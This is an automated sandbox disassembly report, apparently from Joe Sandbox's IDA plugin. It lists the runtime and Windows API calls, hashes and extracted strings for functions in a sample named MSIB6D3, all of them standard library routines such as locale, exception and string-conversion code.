                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                    • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                    • API String ID: 2565136772-3242537097
                                                                                    • Opcode ID: deea9b8b2166752afbb18a304d754b30b6daa70a0bf0b1ec330accaae44da118
                                                                                    • Instruction ID: ebf0907a1554d087d49f056cf83b9724f0f552fede6a0613cb46f0e8f9516773
                                                                                    • Opcode Fuzzy Hash: deea9b8b2166752afbb18a304d754b30b6daa70a0bf0b1ec330accaae44da118
                                                                                    • Instruction Fuzzy Hash: 01015271A85311ABD6211F75AC0DF563BE8DF56B52B1148E5FD08E32B0EE74C884CB61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 00B55DAC
                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00B55DCE
                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 00B55EDD
                                                                                    • IsInExceptionSpec.LIBVCRUNTIME ref: 00B55FAF
                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00B56033
                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00B5604E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                    • String ID: csm$csm$csm
                                                                                    • API String ID: 2123188842-393685449
                                                                                    • Opcode ID: 099ef63357e78c856d045cff97bc51e247d1a9c377d5d6665e40853d9548880c
                                                                                    • Instruction ID: b984bdc92ba6623a73d677fb5fb2d96f237e1d6a3610abb82748a1e50ab8dec2
                                                                                    • Opcode Fuzzy Hash: 099ef63357e78c856d045cff97bc51e247d1a9c377d5d6665e40853d9548880c
                                                                                    • Instruction Fuzzy Hash: 93B14771800609EFCF28DFA4C8A1AAEB7F5EF14317B1440E9EC156B252D730DA59CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,5D8D6CBB,?,?,?), ref: 00B342D2
                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,5D8D6CBB,?,?,?), ref: 00B342F3
                                                                                    • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,5D8D6CBB,?,?,?), ref: 00B34326
                                                                                    • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,5D8D6CBB,?,?,?), ref: 00B34337
                                                                                    • CloseHandle.KERNEL32(00000000,?,5D8D6CBB,?,?,?), ref: 00B34355
                                                                                    • CloseHandle.KERNEL32(00000000,?,5D8D6CBB,?,?,?), ref: 00B34371
                                                                                    • CloseHandle.KERNEL32(00000000,?,5D8D6CBB,?,?,?), ref: 00B34399
                                                                                    • CloseHandle.KERNEL32(00000000,?,5D8D6CBB,?,?,?), ref: 00B343B5
                                                                                    • CloseHandle.KERNEL32(00000000,?,5D8D6CBB,?,?,?), ref: 00B343D3
                                                                                    • CloseHandle.KERNEL32(00000000,?,5D8D6CBB,?,?,?), ref: 00B343EF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandle$Process$OpenTimes
                                                                                    • String ID:
                                                                                    • API String ID: 1711917922-0
                                                                                    • Opcode ID: 681d9ef39ae397848f61c9cfedb46fa289af3dbae597343998b86ecb88a86fcb
                                                                                    • Instruction ID: d4f5ec2370e6a5806946302014c4ff54da7046abe1e850e28d2560ecf1feefe6
                                                                                    • Opcode Fuzzy Hash: 681d9ef39ae397848f61c9cfedb46fa289af3dbae597343998b86ecb88a86fcb
                                                                                    • Instruction Fuzzy Hash: 30518C71D01218EBDB10DF99C984BEEBBF8FF49714F2442A8E514B7290CB706D058BA8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B4BBC4
                                                                                      • Part of subcall function 00B4254E: __EH_prolog3.LIBCMT ref: 00B42555
                                                                                      • Part of subcall function 00B4254E: std::_Lockit::_Lockit.LIBCPMT ref: 00B4255F
                                                                                      • Part of subcall function 00B4254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00B425D0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                                    • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                    • API String ID: 1538362411-2891247106
                                                                                    • Opcode ID: 138ce086f9aa3e4e414f5bd6e746e3ef9c375ecde655b01bce08c1bed0b311e7
                                                                                    • Instruction ID: 1026cdeb7576d1a0e0a747e4c58ad10c556b7f38d99db8627e69b57b3c3f186f
                                                                                    • Opcode Fuzzy Hash: 138ce086f9aa3e4e414f5bd6e746e3ef9c375ecde655b01bce08c1bed0b311e7
                                                                                    • Instruction Fuzzy Hash: F0B19D7254010AABCF19DF68CD99EFE3BE9EB44304F144599FB1AA2251D731DB10EB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B50CA4
                                                                                      • Part of subcall function 00B39270: std::_Lockit::_Lockit.LIBCPMT ref: 00B392A0
                                                                                      • Part of subcall function 00B39270: std::_Lockit::_Lockit.LIBCPMT ref: 00B392C2
                                                                                      • Part of subcall function 00B39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00B392EA
                                                                                      • Part of subcall function 00B39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00B39422
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                    • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                    • API String ID: 1383202999-2891247106
                                                                                    • Opcode ID: da79e0024591b564f9c2f2f6b617ad37310315bfee249014bfa09c5970fa3f2e
                                                                                    • Instruction ID: 27f5ec1aee997e49b1c85001004afb8cbf8ee596f094d676ed105a818921cf29
                                                                                    • Opcode Fuzzy Hash: da79e0024591b564f9c2f2f6b617ad37310315bfee249014bfa09c5970fa3f2e
                                                                                    • Instruction Fuzzy Hash: F5B19F7151020AAFCF29EF68C99AFFE3BF9EB04301F1445D9FD06A6291D6319A18DB50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3.LIBCMT ref: 00B4BF85
                                                                                      • Part of subcall function 00B38610: std::_Lockit::_Lockit.LIBCPMT ref: 00B38657
                                                                                      • Part of subcall function 00B38610: std::_Lockit::_Lockit.LIBCPMT ref: 00B38679
                                                                                      • Part of subcall function 00B38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00B386A1
                                                                                      • Part of subcall function 00B38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00B3880E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                    • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                    • API String ID: 1383202999-2891247106
                                                                                    • Opcode ID: 3df4fe32059fc37c6831b0698679274c01d76e5e5494e18b24553ed089c95f23
                                                                                    • Instruction ID: 4056fe30775675379cb94ad675db9c65582a149a794ca692a51e90c498bca0c7
                                                                                    • Opcode Fuzzy Hash: 3df4fe32059fc37c6831b0698679274c01d76e5e5494e18b24553ed089c95f23
                                                                                    • Instruction Fuzzy Hash: BBB1BE7250110AAFCF59DFA8C995DBE3FF9EB09B40F144199FA02A2252D671CF10EB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00B4855C
                                                                                    • _Maklocstr.LIBCPMT ref: 00B485C5
                                                                                    • _Maklocstr.LIBCPMT ref: 00B485D7
                                                                                    • _Maklocchr.LIBCPMT ref: 00B485EF
                                                                                    • _Maklocchr.LIBCPMT ref: 00B485FF
                                                                                    • _Getvals.LIBCPMT ref: 00B48621
                                                                                      • Part of subcall function 00B41CD4: _Maklocchr.LIBCPMT ref: 00B41D03
                                                                                      • Part of subcall function 00B41CD4: _Maklocchr.LIBCPMT ref: 00B41D19
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                    • String ID: false$true
                                                                                    • API String ID: 3549167292-2658103896
                                                                                    • Opcode ID: 8efffb1e4c106a63211651e4c249bd962a82ad750116f5b22d59aec228ed9d35
                                                                                    • Instruction ID: e10cb812495c209aeb4217ea0c028c6140b2eae99c2d353d04a0a847c0aa4c19
                                                                                    • Opcode Fuzzy Hash: 8efffb1e4c106a63211651e4c249bd962a82ad750116f5b22d59aec228ed9d35
                                                                                    • Instruction Fuzzy Hash: DD2192B2D40308ABDF14EFA4D885ADE7BF8EF04750F048496F914AF252DA708644DBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • LocalAlloc.KERNEL32(00000040,40000022,5D8D6CBB,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00B34154
                                                                                    • LocalAlloc.KERNEL32(00000040,3FFFFFFF,5D8D6CBB,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00B34177
                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B34217
                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,5D8D6CBB,?,?,?), ref: 00B342D2
                                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,5D8D6CBB,?,?,?), ref: 00B342F3
                                                                                    • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,5D8D6CBB,?,?,?), ref: 00B34326
                                                                                    • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,5D8D6CBB,?,?,?), ref: 00B34337
                                                                                    • CloseHandle.KERNEL32(00000000,?,5D8D6CBB,?,?,?), ref: 00B34355
                                                                                    • CloseHandle.KERNEL32(00000000,?,5D8D6CBB,?,?,?), ref: 00B34371
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Local$AllocCloseHandleOpenTimes$Free
                                                                                    • String ID:
                                                                                    • API String ID: 1424318461-0
                                                                                    • Opcode ID: da93080fb63d798ee39e2013c63c1cc92e0d921cab04822387ceaecc0470014a
                                                                                    • Instruction ID: 9776815a9465994cc38493d11d1d5a0c3c49b4a6f5ed4a1d07a31520edcb0ca4
                                                                                    • Opcode Fuzzy Hash: da93080fb63d798ee39e2013c63c1cc92e0d921cab04822387ceaecc0470014a
                                                                                    • Instruction Fuzzy Hash: D1819F71A006059FDB14CFA8DD85BAEBBF5FB48710F2442A9E925F7390DB70A940CB94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 00B526F8
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00B52786
                                                                                    • __alloca_probe_16.LIBCMT ref: 00B527B0
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B527F8
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00B52812
                                                                                    • __alloca_probe_16.LIBCMT ref: 00B52838
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00B52875
                                                                                    • CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00B52892
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
                                                                                    • String ID:
                                                                                    • API String ID: 3603178046-0
                                                                                    • Opcode ID: c2d614d758027ae7d3348e1b312e9cf36b39c9cfd2c2eeeaf05c89ccddf0af36
                                                                                    • Instruction ID: bb63183a218d09ffad4983fd8112e3536c5df794129446c3ca970359e57d01b5
                                                                                    • Opcode Fuzzy Hash: c2d614d758027ae7d3348e1b312e9cf36b39c9cfd2c2eeeaf05c89ccddf0af36
                                                                                    • Instruction Fuzzy Hash: B47161769022059BDF219FA4CC85BAE7BF6EF4A752F2801D9ED04A7250DB358D48CB60
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00B521A3
                                                                                    • __alloca_probe_16.LIBCMT ref: 00B521CF
                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00B5220E
                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B5222B
                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00B5226A
                                                                                    • __alloca_probe_16.LIBCMT ref: 00B52287
                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B522C9
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00B522EC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                    • String ID:
                                                                                    • API String ID: 2040435927-0
                                                                                    • Opcode ID: 015f298cc6e0aa88c0e66d8408560119f4ae34145e278201970a735430d4868f
                                                                                    • Instruction ID: b3502fb009e6533afa97170166fba26ab55e321716fc518cbcd7883c66c382b0
                                                                                    • Opcode Fuzzy Hash: 015f298cc6e0aa88c0e66d8408560119f4ae34145e278201970a735430d4868f
                                                                                    • Instruction Fuzzy Hash: 5451BF7250120AAFEF215F64CC85FAB7BE9EF46742F1140E8FE15A6150DB358D189BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B38657
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B38679
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B386A1
                                                                                    • LocalAlloc.KERNEL32(00000040,00000044,00000000,5D8D6CBB,?,00000000), ref: 00B386F9
                                                                                    • __Getctype.LIBCPMT ref: 00B3877B
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B387E4
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3880E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                    • String ID:
                                                                                    • API String ID: 2372200979-0
                                                                                    • Opcode ID: cc3bf31035c3d46306b7bc792d987385e25785c2f2bd77267a2c870c1398fb5b
                                                                                    • Instruction ID: fc2e3fbcc859767daf0d6d04e6f84d51b22619a122a845b60daad3df0c5e5948
                                                                                    • Opcode Fuzzy Hash: cc3bf31035c3d46306b7bc792d987385e25785c2f2bd77267a2c870c1398fb5b
                                                                                    • Instruction Fuzzy Hash: 1A61C0B1D00744DFDB11DF68C941B9ABBF0EF14314F248299E845AB3A1EB74AE45CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B392A0
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B392C2
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B392EA
                                                                                    • LocalAlloc.KERNEL32(00000040,00000018,00000000,5D8D6CBB,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00B39342
                                                                                    • __Getctype.LIBCPMT ref: 00B393BD
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B393F8
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B39422
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                                    • String ID:
                                                                                    • API String ID: 2372200979-0
                                                                                    • Opcode ID: eb8b7b96739b0f7afdc638f8370e60f0d480c3970112ee3c2f188cdb19da6534
                                                                                    • Instruction ID: d8b6b3ddc11447c6437e63a68996e9664155c9b2eeb14e945e85d744664b95f3
                                                                                    • Opcode Fuzzy Hash: eb8b7b96739b0f7afdc638f8370e60f0d480c3970112ee3c2f188cdb19da6534
                                                                                    • Instruction Fuzzy Hash: 7B51CEB1D04209DFCB21DF68C884B9EBBF4EF14714F248199E845AB391DBB4AE45CB91
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00B53F57
                                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00B53F5F
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00B53FE8
                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00B54013
                                                                                    • _ValidateLocalCookies.LIBCMT ref: 00B54068
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                    • String ID: csm
                                                                                    • API String ID: 1170836740-1018135373
                                                                                    • Opcode ID: c11f06883df51d2928c2268bbfbbdc994aceaafec67e3ae35542b0c398fe3422
                                                                                    • Instruction ID: f30ec3497d4fd9974de3b7b745bca987141c92cc4ecf7260b9263351802c63c6
                                                                                    • Opcode Fuzzy Hash: c11f06883df51d2928c2268bbfbbdc994aceaafec67e3ae35542b0c398fe3422
                                                                                    • Instruction Fuzzy Hash: B241A034E002099BCF11DF68C885B9EBBF5EF08759F1480D5ED189B392DB319A59CB90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000,?,00B67408,00B63841,0000000C,?,00000000,00000000,?,00B67632,00000021,FlsSetValue,00B7BD58,00B7BD60,?), ref: 00B673BC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                                                    • Associated: 00000005.00000002.2114484723.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114621087.0000000000B77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114650919.0000000000B8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.2114678961.0000000000B90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_b30000_MSIB6D3.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID: api-ms-$ext-ms-
                                                                                    • API String ID: 3664257935-537541572
                                                                                    • Opcode ID: 7fb3fa18d6ae1d1a032ea7ca25e5b76466eb5701bbd1e0536085f73e50caa384
                                                                                    • Instruction ID: f5a81f59726657ff5deb37d9a4d0c4e32d338f130f49b3fc80ee880e01608462
                                                                                    • Opcode Fuzzy Hash: 7fb3fa18d6ae1d1a032ea7ca25e5b76466eb5701bbd1e0536085f73e50caa384
                                                                                    • Instruction Fuzzy Hash: DA21D531B89211ABC7219B64AC45E5E37D8DB41764F2401D0ED19A7390EF34ED01D6E4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B3B531
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00B3B54F
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3B577
                                                                                    • LocalAlloc.KERNEL32(00000040,0000000C,00000000,5D8D6CBB,?,00000000,00000000), ref: 00B3B5CF
                                                                                    • std::_Facet_Register.LIBCPMT ref: 00B3B6B7
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00B3B6E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2114542365.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
